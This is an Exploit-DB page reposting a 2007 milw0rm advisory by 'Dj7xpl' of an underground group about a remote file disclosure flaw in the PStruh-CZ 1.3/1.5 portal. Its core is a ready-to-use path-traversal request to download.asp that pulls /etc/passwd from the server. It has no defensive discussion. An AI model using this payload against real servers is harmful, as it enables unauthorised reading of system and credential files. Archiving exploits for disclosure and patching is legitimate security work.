PStruh-CZ 1.3/1.5 (download.asp File) File Disclosure Vulnerability



EDB-ID: 3831 CVE: 2007-2486OSVDB-ID: 38458
Author: Dj7xplPublished: 2007-05-02Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
          /*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*\
          |*                                                                                                 *|
          |*                                    Y! Underground Group                                         *|
          |*                                                                                                 *|
          \*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*/
          /*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*\
             Portal.....:   PStruh-CZ 1.3&1.5
             Type.......:   Remote File Disclosure Vulnerability
             Author.....:   Dj7xpl / dj7xpl@2600.ir
             HomePage...:   http://Dj7xpl.2600.ir
          \*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*/
          /*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*\
             Bug........:
	     download.asp?File=[File Path]&PT=[PostFix]
             download.asp?File=../../../../etc/passwd&pt=zip
          \*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*/
# milw0rm.com [2007-05-02]






Comments

No comments so far